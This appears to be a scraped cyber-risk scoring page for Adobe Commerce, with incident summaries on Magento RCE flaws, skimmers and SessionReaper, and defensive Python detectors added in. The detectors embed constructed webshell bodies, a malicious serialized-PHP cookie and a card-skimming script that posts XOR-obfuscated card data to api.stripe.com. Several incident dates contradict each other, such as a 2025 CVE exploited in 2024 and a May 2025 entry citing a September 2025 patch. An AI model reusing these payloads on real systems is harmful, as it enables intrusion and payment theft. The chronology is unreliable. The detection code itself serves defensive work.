Adobe Commerce A.I CyberSecurity Scoring
Adobe Commerce
Company Information
Website:https://adobe.ly/adobecommerce
Employees number:531
Number of followers:125,098
NAICS:513
Industry Type:Technology, Information and Internet
Homepage:adobe.ly
Adobe Commerce Risk Score (AI oriented)
Updated: 04/06/2026
Score: 708/1000 (band 700-749), grade Ba, rated Moderate
Adobe Commerce Global Score (TPRM): score locked
Current Score: 708 Ba (Moderate)
8 incidents, -9.17 average score impact per incident
Incident timeline with MITRE ATT&CK tactics, techniques, and mitigations.
JUNE 2026
708
MAY 2026
706
APRIL 2026
710
Vulnerability
24 Apr 2026 • Adobe Commerce
Adobe Commerce and Mirasvit: Critical Magento Cache Plugin Vulnerability Enables Remote Code Execution Attacks
Critical Magento Extension Vulnerability Exposes Thousands of Stores to RCE Attacks
706
CRITICAL-4
ADOMIR1780324139
A severe security flaw in the Mirasvit Cache Warmer plugin for Magento and Adobe Commerce is leaving thousands of online stores vulnerable to remote code execution (RCE) attacks. Tracked as CVE-2026-45247 with a CVSS score of 9.8, the vulnerability allows unauthenticated attackers to execute arbitrary code on affected servers by exploiting improper input handling in the plugin’s caching mechanism.
The flaw stems from the plugin passing the user-controlled CacheWarmer cookie to PHP's `unserialize()`, a PHP object injection (CWE-502). Because the call does not restrict which classes may be instantiated (the `allowed_classes` option of `unserialize()` is what would do that), an attacker can name any class the application has loaded, and with a suitable gadget chain in Magento or its dependencies turn the injection into full RCE.
Key Details:
- Affected Software: Mirasvit Cache Warmer (all versions prior to 1.11.12).
- Discovery & Disclosure: Identified by Sansec on April 24, 2026, with Mirasvit notified on May 21 and a patch (v1.11.12) released on May 25.
- Scope: Sansec estimates at least 6,000 Magento stores are running vulnerable versions, though the actual number may be higher due to CDN masking.
- Exploitation Footprint: Malicious requests carry a CacheWarmer cookie whose value is base64-encoded PHP serialized data. The value therefore usually starts with Tz, Qz or YT, which are the base64 encodings of the serialization prefixes `O:` (object), `C:` (custom-serialized class) and `a:` (array).
Impact & Response:
The vulnerability is easily exploitable at scale, with no authentication required. Sansec’s Shield protection blocked attacks for its customers as early as April 24. While Mirasvit has released a patch, security experts warn that exploitation activity is expected to rise following public disclosure.
Administrators are advised to upgrade to v1.11.12 immediately or deploy a web application firewall (WAF) as a temporary mitigation. Compromise assessments, including scans for webshells and unauthorized PHP files in the pub/ directory, are recommended to detect potential breaches.
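The cookie indicator above is worth more than a string match on the first two characters. The following is an added example, not Mirasvit's or Sansec's code: it extracts the CacheWarmer cookie from a request header, base64-decodes it, checks that the bytes have the shape of PHP serialization, and reports which classes an `unserialize()` call would instantiate. The cookie name and the Tz/Qz/YT prefixes come from the advisory; the sample cookie values are constructed, and the class name `stdClass` stands in for whatever gadget a real payload would name.

```python
"""
Added example (not Mirasvit's or Sansec's code): triage CacheWarmer cookie
values for PHP object-injection payloads. Cookie name and the Tz/Qz/YT
prefixes come from the advisory above; sample cookies are constructed.
"""
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Why the advisory's prefixes work: base64 of the first two bytes of a PHP
# serialized value. "O:" -> Tz (object), "C:" -> Qz (custom-serialized class),
# "a:" -> YT (array).
PREFIX_MEANING = {
    base64.b64encode(b"O:").decode()[:2]: "object (O:)",
    base64.b64encode(b"C:").decode()[:2]: "custom-serialized class (C:)",
    base64.b64encode(b"a:").decode()[:2]: "array (a:)",
}
OBJECT_TAGS = {b"O", b"C"}
# O:<len>:"<class>" / C:<len>:"<class>" tokens anywhere in the payload
CLASS_TOKEN = re.compile(rb'[OC]:(\d+):"([^"]*)"')


@dataclass
class Verdict:
    suspicious: bool
    reason: str
    classes: List[str] = field(default_factory=list)


def cookie_value(header: str, name: str = "CacheWarmer") -> Optional[str]:
    """Extract one cookie's value from a raw Cookie request header."""
    for part in header.split(";"):
        key, _, val = part.strip().partition("=")
        if key == name:
            return val
    return None


def analyse_cookie(value: str) -> Verdict:
    """Decide whether a cookie value is a serialized PHP object graph."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return Verdict(False, "not base64")
    if len(raw) < 2 or not raw[:1].isalpha() or raw[1:2] != b":":
        return Verdict(False, "not PHP serialization")
    # Only count class tokens whose declared length matches the name; this
    # mirrors the structural check a strict parser would make.
    classes = [name.decode("latin-1") for n, name in CLASS_TOKEN.findall(raw)
               if int(n) == len(name)]
    meaning = PREFIX_MEANING.get(value[:2], "unknown prefix")
    if raw[:1] in OBJECT_TAGS or classes:
        return Verdict(True, f"serialized PHP {meaning}; instantiates {len(classes)} class(es)", classes)
    return Verdict(False, f"serialized PHP {meaning} with no embedded objects")


# Constructed samples: a value the plugin might legitimately store, an object
# payload, and an array that smuggles an object inside it.
BENIGN = base64.b64encode(b'a:1:{s:4:"page";s:5:"/home";}').decode()
MALICIOUS = base64.b64encode(b'O:8:"stdClass":1:{s:3:"cmd";s:2:"id";}').decode()
NESTED = base64.b64encode(b'a:1:{i:0;O:8:"stdClass":0:{}}').decode()

if __name__ == "__main__":
    header = "PHPSESSID=abc123; CacheWarmer=" + MALICIOUS
    print(analyse_cookie(cookie_value(header)))
    for label, sample in (("benign", BENIGN), ("nested", NESTED)):
        print(label, sample[:2], analyse_cookie(sample))
```

The `NESTED` case is why the advisory lists YT alongside Tz and Qz: an array prefix says nothing about what the array contains, so the class-token scan matters more than the first two characters. On the PHP side the fix is the same as for any CWE-502: never `unserialize()` a cookie at all, and where a serialized format is unavoidable, call `unserialize($value, ['allowed_classes' => false])` so that any object token is turned into `__PHP_Incomplete_Class` instead of instantiated.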
MARCH 2026
713
Vulnerability
19 Mar 2026 • Adobe Commerce
Adobe and Unnamed Car Manufacturer: WebRTC Skimmer Bypasses CSP to Steal Payment Data from E-Commerce Sites
New WebRTC-Based Payment Skimmer Bypasses Security Controls in Major E-Commerce Attack
708
CRITICAL-5
ADOCMB1774536907
Cybersecurity researchers at Sansec have uncovered a sophisticated payment skimmer that leverages WebRTC data channels to exfiltrate stolen payment data, evading traditional security measures. Unlike conventional skimmers that rely on HTTP requests or image beacons, this malware establishes a peer-to-peer WebRTC connection to transmit payloads and stolen information, making detection significantly harder.
The attack targeted an e-commerce website of a car manufacturer and exploited PolyShell, a critical vulnerability in Magento Open Source and Adobe Commerce. The flaw allows unauthenticated attackers to upload arbitrary executables via the REST API, enabling remote code execution. Since March 19, 2026, the vulnerability has been massively exploited, with over 50 IP addresses scanning for vulnerable stores. Sansec reports that 56.7% of all exposed stores have already been compromised.
The skimmer is a self-executing script that opens a WebRTC connection to a hard-coded IP address (202.181.177[.]177) on UDP port 3479. Over that data channel it fetches further JavaScript, injects it into the page and collects payment details. Because the traffic is DTLS-encrypted UDP rather than HTTP, it sidesteps Content Security Policy as commonly deployed: the `connect-src` directive governs fetch, XMLHttpRequest, WebSocket and beacon requests but not WebRTC peer connections, so only the CSP Level 3 `webrtc 'block'` directive (where the browser supports it) or network-level blocking of WebRTC closes this channel, and HTTP-based inspection tools see nothing at all.
Adobe released a beta patch (version 2.4.9-beta1) on March 10, 2026, but the fix has yet to reach production versions. Mitigations include blocking access to the pub/media/custom_options/ directory and scanning for web shells. The attack highlights a growing trend of skimmers using non-HTTP protocols to evade detection.
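Blocking pub/media/custom_options/ stops future use of the directory; the check a practitioner also wants is whether anything was already executed from it. The following is an added example, not Sansec's or Adobe's code: a scanner over combined-format web-server access logs that flags requests for executable files under the custom_options upload directory and, more generally, anywhere under media/, which should only ever serve static uploads. The log lines are constructed, and the URL paths assume the usual deployment with pub/ as the document root.

```python
"""
Added example (not Sansec's or Adobe's code): find requests that executed
code from the custom_options upload directory abused by PolyShell.
The log lines are constructed in Apache/nginx combined format.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List, Optional
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
EXEC_SUFFIXES = (".php", ".phtml", ".phar")
# Assumption: pub/ is the document root, so the directory appears as
# /media/custom_options/. The /pub/ form covers stores served from the repo root.
UPLOAD_DIRS = ("/media/custom_options/", "/pub/media/custom_options/")
MEDIA_DIRS = ("/media/", "/pub/media/")

# Constructed sample: one product image, a PDF a customer legitimately
# uploaded as a custom option, and a dropped shell being used by one source.
SAMPLE_LOG = """\
203.0.113.7 - - [19/Mar/2026:10:01:02 +0000] "GET /media/catalog/product/cache/a/b/shoe.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Mar/2026:10:01:05 +0000] "GET /media/custom_options/quote/s/h/shell.php?cmd=id HTTP/1.1" 200 412 "-" "python-requests/2.31"
198.51.100.23 - - [19/Mar/2026:10:02:11 +0000] "GET /media/custom_options/quote/q/w/design.pdf HTTP/1.1" 200 88211 "-" "Mozilla/5.0"
203.0.113.7 - - [19/Mar/2026:10:03:40 +0000] "POST /media/custom_options/quote/s/h/shell.php HTTP/1.1" 200 77 "-" "python-requests/2.31"
198.51.100.23 - - [19/Mar/2026:10:04:00 +0000] "GET /media/wysiwyg/banner.phtml HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path: str) -> Optional[str]:
    """Severity label for a request path, or None when it is uninteresting."""
    low = path.lower()
    if not low.endswith(EXEC_SUFFIXES):
        return None
    if low.startswith(UPLOAD_DIRS):
        return "high: executable served from the custom_options upload directory"
    if low.startswith(MEDIA_DIRS):
        return "medium: executable under media/, which should only hold static uploads"
    return None


def scan_access_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return the parsed records whose request path classify() flags."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # strip ?cmd=... so the extension check sees the file, not the query
        path = urlsplit(rec["target"]).path
        label = classify(path)
        if label:
            findings.append({**rec, "path": path, "label": label})
    return findings


def top_sources(findings: List[Dict[str, str]]) -> Counter:
    """Source IPs ranked by number of flagged requests."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(h["ts"], h["ip"], h["method"], h["status"], h["path"], "->", h["label"])
    print(top_sources(hits).most_common(3))
```

A 404 on a media/ executable (the last sample line) is still reported: on a store that has not yet been hit it shows someone probing for a file that was dropped elsewhere. Pair the source IPs this produces with the REST API logs for the same time window, since the upload itself arrives through the API rather than through media/.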
FEBRUARY 2026
731
Cyber Attack
27 Feb 2026 • Adobe Commerce
Citroën, Fiat, Diesel, Asus, Bandai, Toyota, Fila, BenQ, Yamaha, Lindt, Trump Organization and Magento: Hackers Compromised 7,500+ Magento Websites to Upload Hidden Malicious Files and Steal Data
Massive Magento Cyberattack Compromises 7,500+ E-Commerce Sites Since February 2026
712
CRITICAL-19
DIETOYFILASUCITBENMAGLINYAMFIATHEBAN1774023969
A large-scale cyberattack campaign has compromised over 7,500 Magento-powered e-commerce websites since late February 2026, with attackers uploading malicious files to publicly accessible web directories across 15,000+ hostnames. The campaign, tracked by Netcraft researchers, marks one of the most extensive Magento-focused attacks in recent years, affecting businesses, government agencies, universities, and non-profits worldwide.
### Scope and Impact
The attack exploited a file upload vulnerability in Magento environments, allowing threat actors to deposit unauthorized files without authentication. Victims include high-profile brands such as Toyota, Fiat, Citroën, Asus, Diesel, Fila, Bandai, FedEx, BenQ, Yamaha, and Lindt, as well as government and university domains in Latin America and Qatar. Several Trump Organization-affiliated sites including trumpstore.com, trumphotels.com, and booktrump.com were also compromised, though researchers confirmed these were incidental targets in an indiscriminate sweep.
Most defacements occurred on subdomains, staging environments, or regional storefronts, with only a few live customer-facing sites briefly impacted before remediation. Attackers left behind text files displaying aliases L4663R666H05T, Simsimi, Brokenpipe, and Typical Idiot Security alongside "greetz" messages, a common practice in defacement circles. A subset of defacements on March 7, 2026, included geopolitical messaging, though analysts determined this was not the campaign’s primary motive.
### Technical Details
The attack leveraged an unauthenticated file upload flaw in Magento, enabling attackers to write files directly to web servers without credentials. Netcraft researchers successfully replicated the behavior on a Magento Community 2.4.9-beta1 test instance, demonstrating that even updated installations could remain vulnerable under certain configurations. The affected platforms include Magento Open Source, Magento Enterprise, Adobe Commerce, and Adobe Commerce with the B2B module.
While Adobe released security bulletins around this period, the observed exploit does not directly align with the published fixes. The campaign shares similarities with the SessionReaper Magento vulnerability from October 2025, which also involved unauthorized file access.
### Attacker Activity and Documentation
The threat actor behind the campaign, operating under the handle "Typical Idiot Security," self-reported many compromised sites to Zone-H, a public defacement archive. This suggests the attacker sought recognition within the defacement community rather than pursuing financial or political objectives.
As of the latest reports, new compromised sites were still emerging, indicating the campaign remained active. Organizations running Magento-based infrastructure were urged to review file upload endpoints, apply security updates, and monitor web directories for unauthorized changes.
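The Mirasvit and PolyShell entries above both end with the same advice, scan pub/ for webshells and unauthorized PHP files, and this entry adds monitoring web directories for unauthorized changes. One added example serves all three; it is not Netcraft's, Sansec's or Adobe's code. It takes a SHA-256 baseline of a pub/ tree, diffs the tree against that baseline later, and flags executable files that sit where no code belongs (media/, static/), top-level PHP entry points outside an allowlist, and files that carry several webshell markers at once. The allowlist is illustrative and should be replaced with the entry points your own release ships; the sample tree is constructed in a temporary directory.

```python
"""
Added example (not Netcraft's, Sansec's or Adobe's code): baseline and scan a
Magento/Adobe Commerce pub/ tree for unauthorized or webshell-like PHP.
The sample tree is constructed in a temporary directory.
"""
import hashlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

EXEC_SUFFIXES = {".php", ".phtml", ".phar"}
# Illustrative allowlist of PHP entry points under pub/ (assumption: replace
# with the files your own release actually ships there).
ALLOWED_PHP = {"index.php", "get.php", "static.php", "cron.php", "health_check.php"}
# Directories that hold uploads and built assets and must never contain code.
NO_CODE_DIRS = ("media", "static")

WEBSHELL_MARKERS = [
    (re.compile(rb"\beval\s*\("), "eval()"),
    (re.compile(rb"\b(system|passthru|shell_exec|exec|popen|proc_open)\s*\("), "command execution"),
    (re.compile(rb"\bbase64_decode\s*\("), "base64_decode()"),
    (re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\["), "request-controlled input"),
    (re.compile(rb"\bphpinfo\s*\("), "phpinfo() probe"),
]


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> Dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_baseline(root: Path, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Report files added, modified or removed since the baseline was taken."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in current.keys() & baseline.keys()
                           if current[p] != baseline[p]),
    }


def find_suspicious_php(root: Path) -> List[Tuple[str, List[str]]]:
    """Flag code in no-code dirs, unexpected top-level PHP, and webshell markers."""
    findings = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in EXEC_SUFFIXES:
            continue
        rel = p.relative_to(root).as_posix()
        top = rel.split("/")[0]
        reasons = []
        if top in NO_CODE_DIRS:
            reasons.append(f"executable file under pub/{top}/")
        elif "/" not in rel and p.name not in ALLOWED_PHP:
            reasons.append("PHP entry point not in allowlist")
        hits = [label for rx, label in WEBSHELL_MARKERS if rx.search(p.read_bytes())]
        if len(hits) >= 2:  # a single marker is common in legitimate code
            reasons.append("webshell markers: " + ", ".join(hits))
        if reasons:
            findings.append((rel, reasons))
    return findings


def make_sample_pub() -> Path:
    """Construct a small pub/ tree (sample data, not a real store)."""
    root = Path(tempfile.mkdtemp(prefix="pub-"))
    files = {
        "index.php": b"<?php require __DIR__ . '/../app/bootstrap.php';\n",
        "media/catalog/product/a.jpg": b"\xff\xd8\xff\xe0fake-jpeg",
        "static/frontend/theme.js": b"console.log('ok');\n",
        # webshell-like file dropped where only customer uploads should live
        "media/custom_options/quote/s/h/shell.php":
            b"<?php eval(base64_decode($_POST['c'])); ?>",
    }
    for rel, data in files.items():
        dest = root / rel
        dest.parent.mkdir(parents=True, exist_ok=True)
        dest.write_bytes(data)
    return root


def demo():
    """Baseline the sample tree, simulate a later drop, return (findings, diff)."""
    root = make_sample_pub()
    baseline = build_baseline(root)
    (root / "media" / "dropped.phtml").write_bytes(b"<?php system($_GET['cmd']); ?>")
    return find_suspicious_php(root), diff_baseline(root, baseline)


if __name__ == "__main__":
    findings, changes = demo()
    for rel, reasons in findings:
        print(rel, "->", "; ".join(reasons))
    print(changes)
```

Run the baseline step right after a clean deploy and keep the hash map outside the web root, otherwise an attacker who can write to pub/ can also rewrite the baseline. The marker scan is a triage aid, not a verdict: a file under media/ with a .php suffix is a finding on its own, whatever its contents.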
JANUARY 2026
730
DECEMBER 2025
747
Cyber Attack
24 Dec 2025 • Adobe Commerce
Google, Stripe and Magento/Adobe Commerce: Credit card theft campaign abuses Stripe to host stolen payment info
New Magecart Campaign Exploits Stripe API to Steal Payment Data
729
CRITICAL-18
ADOSTRGOO1780611936
Researchers at Sansec have uncovered a sophisticated Magecart campaign leveraging Stripe’s API infrastructure and Google Tag Manager (GTM) to steal credit card details from e-commerce checkout pages. The attack, active since at least December 24, 2025, abuses trusted domains googletagmanager.com and api.stripe.com to bypass security filters and exfiltrate stolen data undetected.
The malware is embedded in legitimate-looking GTM containers and executes when a shopper reaches a checkout page. It targets Magento/Adobe Commerce stores, capturing payment details (card number, CVV, expiration date), billing information, and customer contact data. The stolen data is XOR-obfuscated, stored locally in the browser, and later exfiltrated through Stripe's API by creating fake customer records under the attacker's account (cus_TfFjAAZQNOYENR).
A variant of the campaign uses Google Firestore (project: braintree-payment-app, document: tracking/captcha) to host the payload and store stolen data, blending in with legitimate payment and bot-protection traffic. Once exfiltrated, the malware wipes local traces to avoid detection.
The attack highlights how threat actors exploit trusted platforms to evade security measures, turning payment processors into unwitting storage for stolen financial data.
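Because the exfiltration goes to domains every CSP allowlist already trusts, the practical control is to audit what the tag manager is actually loading. The following is an added example, not Sansec's, Google's or Stripe's code: it walks a GTM container export, looks only at Custom HTML tags, and reports those that contact the trusted sinks named above, read payment fields while having a network egress path, or contain XOR/decoding loops. The export layout assumed here (a `containerVersion` holding a `tag` list, Custom HTML tags of type `"html"` carrying their script in an `"html"` parameter) is my reading of GTM's export format and should be checked against a real export; the container and its three tags are constructed.

```python
"""
Added example (not Sansec's, Google's or Stripe's code): audit a Google Tag
Manager container export for Custom HTML tags that behave like a checkout
skimmer. The export layout is an assumption; the container is constructed.
"""
import re
from typing import Dict, List

# Endpoints the incident shows being abused as a drop because CSP allowlists
# and filters already trust them.
TRUSTED_SINKS = ("api.stripe.com", "firestore.googleapis.com")
NETWORK_EGRESS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|RTCPeerConnection|WebSocket)\b")
PAYMENT_FIELDS = re.compile(r"(cc_?number|card_?number|cvv|cvc|cc_cid|exp_?(month|year|date)|expir)", re.I)
OBFUSCATION = re.compile(r"(atob\(|String\.fromCharCode|unescape\(|\\x[0-9a-fA-F]{2}|charCodeAt\([^)]*\)\s*\^)")


def html_of(tag: Dict) -> str:
    """Return the script body of a Custom HTML tag ('' for other tag types)."""
    if tag.get("type") != "html":
        return ""
    for param in tag.get("parameter", []):
        if param.get("key") == "html":
            return param.get("value", "")
    return ""


def audit_tag(tag: Dict) -> List[str]:
    """Reasons this tag looks like a skimmer; empty list when nothing stands out."""
    body = html_of(tag)
    if not body:
        return []
    reasons = []
    sinks = [s for s in TRUSTED_SINKS if s in body]
    if sinks:
        reasons.append("contacts trusted sink(s): " + ", ".join(sinks))
    if NETWORK_EGRESS.search(body) and PAYMENT_FIELDS.search(body):
        reasons.append("reads payment fields and has a network egress path")
    if OBFUSCATION.search(body):
        reasons.append("obfuscation or XOR decoding present")
    return reasons


def audit_container(export: Dict) -> List[Dict]:
    """Audit every tag in a container export; return the flagged ones."""
    out = []
    for tag in export.get("containerVersion", {}).get("tag", []):
        reasons = audit_tag(tag)
        if reasons:
            out.append({"tagId": tag.get("tagId"), "name": tag.get("name"),
                        "triggers": tag.get("firingTriggerId", []), "reasons": reasons})
    return out


# Constructed container: a normal GA tag, a harmless chat loader, and a
# "tracking" tag that XORs card fields and posts them to api.stripe.com.
SAMPLE_EXPORT = {
    "exportFormatVersion": 2,
    "containerVersion": {
        "tag": [
            {"tagId": "1", "name": "GA4 config", "type": "googtag",
             "parameter": [{"type": "TEMPLATE", "key": "tagId", "value": "G-EXAMPLE1"}],
             "firingTriggerId": ["2147479553"]},
            {"tagId": "7", "name": "Chat widget", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html",
                            "value": "<script src=\"https://chat.example.com/widget.js\"></script>"}],
             "firingTriggerId": ["2147479553"]},
            {"tagId": "12", "name": "Checkout tracking", "type": "html",
             "parameter": [{"type": "TEMPLATE", "key": "html", "value": (
                 "<script>var k=0x5a,f=['cc_number','cc_cid','expiration'];"
                 "function x(s){var o='';for(var i=0;i<s.length;i++)"
                 "o+=String.fromCharCode(s.charCodeAt(i)^k);return o;}"
                 "document.addEventListener('submit',function(){var d=f.map(function(n){"
                 "return document.querySelector('[name='+n+']').value}).join('|');"
                 "fetch('https://api.stripe.com/v1/customers',{method:'POST',"
                 "body:'description='+btoa(x(d))})});</script>")}],
             "firingTriggerId": ["88"]},
        ]
    },
}

if __name__ == "__main__":
    for finding in audit_container(SAMPLE_EXPORT):
        print(finding["tagId"], finding["name"], finding["triggers"])
        for r in finding["reasons"]:
            print("  -", r)
```

Resolve the reported trigger IDs against the export's `trigger` list: a Custom HTML tag that fires only on checkout URLs and talks to a payment API the store does not use is the pattern in this campaign. The audit is static, so a tag that fetches its real payload at runtime will only show the egress; treat any Custom HTML tag on checkout pages as something to read in full.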
NOVEMBER 2025
747
OCTOBER 2025
746
SEPTEMBER 2025
750
Vulnerability
09 Sep 2025 • Adobe Commerce
Adobe
Exploitation Attempts Targeting CVE-2025-54236 (SessionReaper) in Adobe Commerce and Magento Open Source
745
CRITICAL-5
ADO5132051102325
Adobe is facing active exploitation attempts targeting CVE-2025-54236 (SessionReaper), a critical Improper Input Validation vulnerability in Adobe Commerce and Magento Open Source. The flaw allows attackers to take over customer accounts and, in certain configurations (e.g., file-based session storage), achieve unauthenticated remote code execution (RCE). Over 250 exploitation attempts were blocked in a single day, with mass exploitation expected within 48 hours because exploit details are publicly available.
Only 38% of Magento stores have applied the patch, leaving the vast majority exposed. Attackers are deploying PHP webshells and phpinfo probes, indicating reconnaissance for deeper compromise. The vulnerability affects multiple versions of Adobe Commerce, Magento Open Source, and the B2B edition. While Adobe released a hotfix on September 9, 2025, the leak of technical details a week earlier accelerated attacker activity. Sansec researchers warn that automated scanning tools are emerging rapidly, increasing the risk of large-scale breaches. Administrators are urged to patch immediately and scan for signs of intrusion; delayed action could lead to widespread account takeovers, data theft, or financial fraud through compromised e-commerce platforms.
AUGUST 2025
750
JULY 2025
749
JUNE 2025
753
Vulnerability
16 Jun 2025 • Adobe Commerce
Adobe (Adobe Commerce / Magento)
Active Exploitation of SessionReaper Vulnerability (CVE-2025-54236) in Adobe Commerce (Magento)
749
CRITICAL-4
ADO0402304102325
Hackers are actively exploiting CVE-2025-54236 (SessionReaper), a critical improper input validation vulnerability in Adobe Commerce (formerly Magento). The flaw allows attackers to take over customer accounts via the Commerce REST API without user interaction, potentially leading to unauthorized access to sensitive customer data, financial fraud, or full account compromise.
Over 250 exploitation attempts were blocked in a single day, with 62% of Magento stores remaining unpatched and vulnerable. Attackers are deploying PHP webshells and reconnaissance probes (phpinfo) to assess system configurations, escalating the risk of large-scale data breaches or financial theft. The vulnerability affects multiple versions, including 2.4.9-alpha2, 2.4.8-p2, and earlier, with the default configuration (file-based session storage) being the primary attack vector.
Adobe issued an emergency patch, but slow adoption, with only 40% of stores patched after six weeks, leaves thousands of e-commerce platforms exposed to account takeovers, payment fraud, and reputational damage. Security firms warn of increased attack volumes following public technical analyses and urge immediate patching to prevent widespread customer data compromise and operational disruption.
MAY 2025
758
Vulnerability
01 May 2025 • Adobe Commerce
Adobe
Critical SessionReaper Vulnerability (CVE-2025-54236) in Adobe Commerce and Magento Open Source
753
CRITICAL-5
ADO1892518090925
Adobe has disclosed a critical vulnerability (CVE-2025-54236, dubbed SessionReaper) in its Commerce and Magento Open Source platforms that allows unauthenticated attackers to bypass security features and hijack customer accounts via the Commerce REST API. Though no active exploitation has been observed yet, a leaked hotfix may accelerate exploit development by threat actors. The flaw, deemed one of the most severe in Magento's history, enables session forging, privilege escalation, and potential code execution, mirroring past high-impact vulnerabilities such as CosmicSting and Shoplift.
Adobe released an emergency patch on September 9, 2025, urging immediate deployment, as delayed action leaves systems exposed to automated, large-scale attacks. Cloud-based Adobe Commerce customers received temporary protection through a WAF rule, but on-premise and unpatched instances remain at risk. Exploitation relies on the default session storage configuration, which widens its reach. Failure to patch could lead to widespread account takeovers, financial fraud, and operational disruption for e-commerce businesses, with Adobe offering limited remediation support after a breach. Researchers warn of high automation potential and stress the urgency for administrators to test and apply the fix despite potential compatibility issues with custom code.
JUNE 2024
773
Vulnerability
16 Jun 2024 • Adobe Commerce
Adobe
Exploitation of CVE-2025-54236 (SessionReaper) in Adobe Commerce and Magento Open Source Platforms
756
CRITICAL-17
ADO0092800102325
Threat actors are actively exploiting CVE-2025-54236 (CVSS 9.1), a critical improper input validation vulnerability in Adobe Commerce and Magento Open Source, enabling account takeovers via the Commerce REST API. Over 250 attack attempts were recorded in 24 hours, with 62% of Magento stores remaining unpatched six weeks post-disclosure. Exploits involve dropping PHP webshells and extracting PHP configuration data via fake sessions, risking full customer account compromise. The flaw, dubbed SessionReaper, follows a similar 2024 deserialization vulnerability (CosmicSting, CVE-2024-34102), highlighting a pattern of high-severity exploits in Adobe’s e-commerce platforms. Public proof-of-concept (PoC) exploits and technical analyses (e.g., by Searchlight Cyber) accelerate attack adoption. Adobe confirmed in-the-wild exploitation, urging immediate patching to prevent widespread account hijacking, data theft, or backend system infiltration—potentially disrupting payment processes, customer trust, and operational integrity for affected stores.
Frequently Asked Questions
What is the current A.I Rankiteo Cyber Score for Adobe Commerce?
What was Adobe Commerce's A.I Rankiteo Cyber Score in May 2026?
What was Adobe Commerce's A.I Rankiteo Cyber Score in April 2026?
What was Adobe Commerce's A.I Rankiteo Cyber Score in March 2026?
What was Adobe Commerce's A.I Rankiteo Cyber Score in February 2026?
What was Adobe Commerce's A.I Rankiteo Cyber Score in January 2026?
What was Adobe Commerce's A.I Rankiteo Cyber Score in December 2025?
What was Adobe Commerce's A.I Rankiteo Cyber Score in November 2025?
What was Adobe Commerce's A.I Rankiteo Cyber Score in October 2025?
What was Adobe Commerce's A.I Rankiteo Cyber Score in September 2025?
What was Adobe Commerce's A.I Rankiteo Cyber Score in August 2025?
What was Adobe Commerce's A.I Rankiteo Cyber Score in July 2025?
What is the average per-incident point impact on Adobe Commerce's A.I Rankiteo Cyber Score over the past 12 months?
Where can I access detailed records of all cyber incidents associated with Adobe Commerce?
Where can I find a summary of the A.I Rankiteo Risk Scoring methodology?
Where can I view Adobe Commerce's profile page on Rankiteo?
How accurate is the A.I Rankiteo Risk Scoring methodology?